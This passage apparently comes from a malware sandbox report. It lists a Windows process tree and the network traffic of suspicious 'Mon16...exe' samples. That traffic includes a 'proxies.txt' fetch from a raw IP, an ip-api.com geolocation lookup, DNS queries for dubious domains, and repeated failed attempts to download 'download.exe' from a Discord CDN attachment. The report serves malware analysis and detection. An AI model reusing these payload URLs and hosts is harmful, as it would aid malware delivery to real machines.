      • C:\Windows\servicing\TrustedInstaller.exe
        C:\Windows\servicing\TrustedInstaller.exe
        1⤵
          PID:1100
          • C:\Windows\system32\makecab.exe
            "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241106104111.log C:\Windows\Logs\CBS\CbsPersist_20241106104111.cab
            2⤵
            • Drops file in Windows directory
            PID:2108
        • C:\Windows\system32\conhost.exe
          \??\C:\Windows\system32\conhost.exe "-1326065463-17732016232079665164538795616749644004-1611431629-1021433569-552968636"
          1⤵
            PID:2492
          • C:\Windows\system32\wbem\WMIADAP.EXE
            wmiadap.exe /F /T /R
            1⤵
              PID:1300
            • C:\Windows\system32\conhost.exe
              \??\C:\Windows\system32\conhost.exe "-1739371705716997079-3753041-21431654931733133288-1560707188-21284361101814353396"
              1⤵
                PID:2016
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "410733652-792252731-15552243301337362575265087720-19596527081131691164-1956904596"
                1⤵
                  PID:1048

                Network

                • flag-fr
                  GET
                  http://212.193.30.45/proxies.txt
                  Mon166dc6040fb8726.exe
                  Remote address:
                  212.193.30.45:80
                  Request
                  GET /proxies.txt HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: 
                  Host: 212.193.30.45
                  Response
                  HTTP/1.1 301 Moved Permanently
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 06 Nov 2024 10:41:10 GMT
                  Content-Type: text/html
                  Content-Length: 178
                  Connection: keep-alive
                  Location: https://212.193.30.45/proxies.txt
                • flag-us
                  DNS
                  www.listincode.com
                  Mon1631358b82299bd8.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.listincode.com
                  IN A
                  Response
                  www.listincode.com
                  IN CNAME
                  expired.namebright.com
                  expired.namebright.com
                  IN CNAME
                  cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                  cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                  IN A
                  52.203.72.196
                  cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                  IN A
                  54.84.177.46
                • flag-us
                  DNS
                  56.jpgamehome.com
                  Mon16e127a54386dd68.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  56.jpgamehome.com
                  IN A
                  Response
                • flag-us
                  DNS
                  tweakballs.com
                  Mon16737798ac26f984.tmp
                  Remote address:
                  8.8.8.8:53
                  Request
                  tweakballs.com
                  IN A
                  Response
                • flag-us
                  DNS
                  ip-api.com
                  Mon1618e4439d986270.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  ip-api.com
                  IN A
                  Response
                  ip-api.com
                  IN A
                  208.95.112.1
                • flag-us
                  GET
                  http://ip-api.com/json/
                  Mon1618e4439d986270.exe
                  Remote address:
                  208.95.112.1:80
                  Request
                  GET /json/ HTTP/1.1
                  Connection: Keep-Alive
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                  viewport-width: 1920
                  Host: ip-api.com
                  Response
                  HTTP/1.1 200 OK
                  Date: Wed, 06 Nov 2024 10:41:12 GMT
                  Content-Type: application/json; charset=utf-8
                  Content-Length: 289
                  Access-Control-Allow-Origin: *
                  X-Ttl: 38
                  X-Rl: 43
                • flag-us
                  DNS
                  cdn.discordapp.com
                  Mon164c5af508c3.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  cdn.discordapp.com
                  IN A
                  Response
                  cdn.discordapp.com
                  IN A
                  162.159.133.233
                  cdn.discordapp.com
                  IN A
                  162.159.129.233
                  cdn.discordapp.com
                  IN A
                  162.159.130.233
                  cdn.discordapp.com
                  IN A
                  162.159.135.233
                  cdn.discordapp.com
                  IN A
                  162.159.134.233
                • flag-us
                  DNS
                  webdatingcompany.me
                  Mon161bd381a14aea5c.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  webdatingcompany.me
                  IN A
                  Response
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Connection: Keep-Alive
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:16 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=.X9AGwIh2JtqocTdFqmjQvuNM7hDrWDrEBIwWlU0q5I-1730889676-1.0.1.1-E3sREpKtYKYjhdcMvl_XDIanxujZ2FiP9PiR_qQnlguMiaqJMXjCo8Q8L3dJCul2Hwv8KqEBZ_K42zPRrKJd8g; path=/; expires=Wed, 06-Nov-24 11:11:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBpjWWDBsoPRARqphngwqCAcPNR%2BlWd58swonQnL6boDNGNSOi1nImYtutHeUOTl3eyxNqIzyEErTzk6e45Njp3PEhSYogG8JZ%2FL0ELaP6u9rXruQWe%2F0T1Fh3rMG7s5kF2A%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=BJkJqPSJ9u24hFjSlPJWyNCNmuyLlrU7qvOLwHvZYRQ-1730889676090-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de4785b1b5593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:22 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=bdhYEghqP9KZyLdQzX_OOyvr6AEUYCy4YxNz7q9kOw0-1730889682-1.0.1.1-WbBFtEaNIgzOCB9wU5WqW0CVGu3TIDM7t8IlZawpS_cabx0DZAx0S3tIaRNUmHF3cm2hKMNjvYMRZUD523mByQ; path=/; expires=Wed, 06-Nov-24 11:11:22 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2v5NZXGq6E1u27ii9PwVlnqZ%2FuxihsbkThml%2BD2vZT1AqK2XLJrX3Szji%2F2XJfFaMbcGBUuL85TEVPoHvHKbSMufog7%2FTLmdAzaKEDdoXBAaAcT9s2PG%2B8M0htUQGzqW2i1yIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=mcrxekeu2hmao_p5Bfew8Reo3nkfZUpHLDNalPrkmxU-1730889682183-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478816a5b93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:27 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=KiPBZPREwj4yLzFO4UUJhX5vVmawtzvZ53dA2mNQXUo-1730889687-1.0.1.1-.UAdUeFj2NNipGS521JMor_6LsVwtOk.ngJK1kEQL4hIUMpcXnOda7i_VsMzNvLQIda0y6eQhhmaAgfDTNWxOA; path=/; expires=Wed, 06-Nov-24 11:11:27 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SW5X0siLrMegQi0TeQMnxhEHOED8QozCfkgpzy1okp6nm6Cv3rw4QkQ%2Boi6MEKLXohwisYXTyuJr1Qj66H9DFr%2Ba84inKoeeJBewdTbAORdW5nGgANrznLmf%2F%2Fbg2Z7EL3s6Dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=ALFirbTkYn_d47UtyaH.8IBA1YiBVWLPHZStga5lvvA-1730889687283-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478a13ca793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:32 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=D8wg3KRwbEcN89yLg.hIX0oYw5GuBRZ0.OxTajfD8bA-1730889692-1.0.1.1-ao4.3yIVwMfraKldZFkbmTQs3MMsMXvQs2tMyg26wLDitd1z3ExAsvfUBVIkWntA3qKvsOEmr.KJlu8O39Nj.g; path=/; expires=Wed, 06-Nov-24 11:11:32 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iVPtbYzTgBWC0aczjZy%2FiUoWdJ6czJNiAuqqM23asjzTNsIMpcacrhNAB6GhifzhYRL2lacRk5yqgnRcWDIyNoeHnHj5iqY%2FXIRaJOcoU8W7FiYsANTf%2Bqg%2BIfzFqbQQXY7zOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=Vwry54tDzL72LbVyDWF5h1nmqeVOonm1qVreYjLOfhs-1730889692374-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478c128ce93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:37 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=6gXadrdfAkn0GqjwmPidhG0Gnk68UfbXNzdGx10O1lQ-1730889697-1.0.1.1-24qV.rIyQiucygWE4rdA0UTlHSaiDYoOcwrvxaVNFZ4tSuhJoWcbZ0nh16CfDXMU0WIELffU4MlaNkka9Pxxfg; path=/; expires=Wed, 06-Nov-24 11:11:37 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kxqvwGbTl7vowudrrLT1JQ%2BCN54MaSYHLwYRvMzHCgY0j2mz8VPz%2F9QVEDGO4FmpAgFGkrc4IoisKIVRQDwnf4tf%2FNyE1C%2FAePeondSw5757w0xinmPTUVQAIPmExMbxhH4EUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=yTThKIJNIk4G4M_ctK6u5H0ribKA5IAS3OMP_jJNmk0-1730889697518-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de478e13d0993f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:42 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=Z7ntRdLi.D0PCMOewdZGKrzsejnt0.2UIwUt1mJEmMI-1730889702-1.0.1.1-P4LBACkca8VmoFw1S8XgzbWNGv1N9zBXokl2r9c9cg62uhlspD6ccazl3D9RwoDUWafmu0Rxh6uHrTIFImQJxA; path=/; expires=Wed, 06-Nov-24 11:11:42 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lb8BX4sKX65Ou%2BpN6%2F1R7h%2BXcwW7WqybmnJU4qKvOWq3Uf8YnHvH9deib7sdn1%2FJs5M2gAHAyciFJs57DQArq4c6v0thuftSQyr%2FpPceGgtAXPr5OJttEccIpNgsSRvHnsnpeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=GH3FUgKPt7axBiKeYMyW7pZjIehC6wxPdmtekuk1zAU-1730889702610-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479010b0993f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:47 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=NVUvltmMfoyRbxo9gz2FnFMYrIancUIVIlIjVgdYv5w-1730889707-1.0.1.1-AMgCtgg3rKalKsGYUq0FaFMsG4JcBOFyz0VFtbesISS6qxfxWZlXAHkGRfemcQk16gblaLA.Wh6uYe2cHwFwQg; path=/; expires=Wed, 06-Nov-24 11:11:47 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OIrUvBP6jH%2BPGOvRcmMRukY2jWUfDEYArSpCk8gXWmS8Huc1T13PGPMIRUiUK9y2FRq%2BGJnfDbNTTWRHy79RgAe9PfNVPTWjARYdyLaLCbM6t61hYkkJcMavdijJFQKsjoAR7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=6IQE7WJdsSk6NgXkCXKTYLJBw8su9uRd8mLkLkn_SvE-1730889707673-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de47920d9e793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:52 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=HWojD4ZYmTtzNp3LeTyE8MEhJdvGt1vY.mnIDZGXmOM-1730889712-1.0.1.1-LiAvC5QKvQOlMnNiBfvSvhZ2E_zSCjtaegoSd1dXlDWFjyjGPat3PLq1cLTzu.NXJRiQ52CXHqO7FRGMEfF.NQ; path=/; expires=Wed, 06-Nov-24 11:11:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WNSmQUHRlJ7zfTX9enLkZPYlSUIje9nAFm9iwt82Y3XphrQSSK%2BOOiI4Aws7RtXv5wwPxU%2FXT1NubbHJj4UNFNVzDEg4hM9q%2B0zpEPDrh9LOVNGHf8eIIXFZwmGDQIFF7ux0zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=YG3iQcIfgg0BFsNn6V88A2Az4ElThp6UaXayx9pgLcM-1730889712738-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479408ea893f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:41:57 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=tijGjU0G1S6UoDK5BvGezxkG9EeanHK05WFWxg.42gs-1730889717-1.0.1.1-RBjO7Ktebg2GwdYRCuFlNw09dn81z6XG04xARLaUmW7ZWAj7KVFKnXu9RXtff0NuspZCyJB3TFsuiqFNN3RHew; path=/; expires=Wed, 06-Nov-24 11:11:57 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wxGsX%2BQYYLaj0jdesuyPFur7SWh%2BlC4jGoJMx94%2BOvwo2Ndmaue0jgsZhRM%2FGuP2sdIkaccLRELeHOBZfHXrqGf9K1AX63%2BFvj%2BS9Cui79qsJya5yrkwVCDzlcy3XNFL7PvU2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=JcMDXNzl1S9Ydf4IaxrsN4vNtS.2OgLcop.QJGrfkrk-1730889717817-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479602c2793f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:02 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=voIzlx4dg425ik0vDyJCy.v.KubPHdiwyy1DWGxclvo-1730889722-1.0.1.1-OU9ZUvLNnEVgTdNNfGTlSeZ7sG4GHwU7gJf6rZqePXRaoIZ33s3w2taaAWVKpmSopDeOJ2.HMKU8QuYGk7Nrig; path=/; expires=Wed, 06-Nov-24 11:12:02 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=188D18HJavTMIkr3FPaBN9RlhTnvkPlwlQeLNKqP0S8QmNrrfSWXS1zvoeyWT1bZNloi22pl2y0u6Fv%2Fd9W9nEvNJ2VCRAPtyZykjS4py9i%2BaQpZlWf6k%2BWmhpVde66wDIxmNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=tqmJ77mvlBH4oeLBiJoCMmmQzysgpLXAz5B_taOC5.I-1730889722912-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de4797fd83b93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:08 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=yH8IXZEHN0phdS_hXzPQsMxcToP1CVa9ujPGomhx860-1730889728-1.0.1.1-czAuCSrJ82g21XvmUKW0Vj9tRfqrQtEY3hOAQcrvxHHWSIFuBM43QcyXwdK93wGP5642iu1I2ltvA6BZdpLjbw; path=/; expires=Wed, 06-Nov-24 11:12:08 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYa24C7lay8xW6KXfP7y0eoIaXYBqWgAkfrDpFlBd01Aep8Nxw6Iurl8XDwgdSP87243kLujGlBVDp79naR3vsFQc2zSLCjQJ%2Biv0F%2FeqHwYRacqpi8GCXbhAFwrttUp2YDQAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=UpztrWaDeyXwulZgf3WgVoYx4i7pza4F01lByNL9e88-1730889728037-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de4799fbe4593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:13 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=HHpEjk60PYv4qERvRCzlHi.EOl4Le5l1pyZ7CFYpL9k-1730889733-1.0.1.1-DAd4VBjq7cf61AOD1rkA.FPm.ds0C9oLr3vDdXwD46C4Ikxe8u6WSwVWcIYWOZm5IFpf3ZCBpDpL5nd_DFd5Qg; path=/; expires=Wed, 06-Nov-24 11:12:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihL%2BoCwZRhX1pmqq1HwUOySpX8we046HWXP4hhiG7YnMZQE6NCrNM46TTnkFcsppexO89W2AG57RV7AXZ0wveMwG7B5QZAgTyXLJNwV8huRRluYKGuzipycovX5YP7GEUSHJmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=xPYqmVn3IikzXb2jznKPOgn00mFx1CgW54RpfzJvVAI-1730889733130-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479bfdc3593f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:18 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=yThev44QhTFN7VmTU_QwK8Z0s3FyZTiQ_ujwUU2.j1Y-1730889738-1.0.1.1-0UQbqk6D3fkM32ADL9GJJk_VHRqfhjv9Bt2srYtiKnPD8.U0DGTvJc8JZMYMiAD8p1XBncKL_Z1eDFM0UxgaKQ; path=/; expires=Wed, 06-Nov-24 11:12:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSb3MQ80EWXh8WfgZkZDIbyMWtwSk4xYyAoOEM5BFexpLYJX%2B%2FtI6sgrXV9jtldG%2BDuUkY2H4uhslqUn%2BY14gUpkXRggsn9HCqP2LCB9oQibFyGmN3AOXfJGyaAhHhTachQrEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=HYPALc1ZOmWZKX61ORVQ8wrFqS7QKFVAdFQIFwQn5Dw-1730889738218-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479dfacff93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:23 GMT
                  Content-Type: text/plain;charset=UTF-8
                  Content-Length: 36
                  Connection: keep-alive
                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                  Set-Cookie: __cf_bm=3yourbBp__MNcOOqcGCS9LXeXy9JmKohP6ejnyVCafw-1730889743-1.0.1.1-43E869nUcgc3hKYQw56XKDuLO5QgaM39Ox8lNt8IBcA9_nfLgw9NGH6ORoEwankbKGuKHzXWlzrT8usIHZeMAg; path=/; expires=Wed, 06-Nov-24 11:12:23 GMT; domain=.discordapp.com; HttpOnly; Secure
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tAmjwSoPCr2K0R6vmphYmujNS%2B9F%2BsLbXIszbpPRNB4qUENuAUSBMKLcqUM7idrYjE3QEGRqYaGj16Re3PF9zMCGcYSEFhoXXcGV4ZVYJ89XVjTOCLyHb8%2FqQZzhTf5UiVxCNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Set-Cookie: _cfuvid=P3ni90yciPfCJYLw35sbgj4bnJeN8MmwwKm369NtfU4-1730889743299-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                  Server: cloudflare
                  CF-RAY: 8de479ff581c93f0-LHR
                  alt-svc: h3=":443"; ma=86400
                • flag-us
                  GET
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  Mon164c5af508c3.exe
                  Remote address:
                  162.159.133.233:443
                  Request
                  GET /attachments/910281601559167006/912364128956461126/download.exe HTTP/1.1
                  Host: cdn.discordapp.com
                  Response
                  HTTP/1.1 404 Not Found
                  Date: Wed, 06 Nov 2024 10:42:28 GMT
                  Content-Type: text/plain;charset=UTF-8
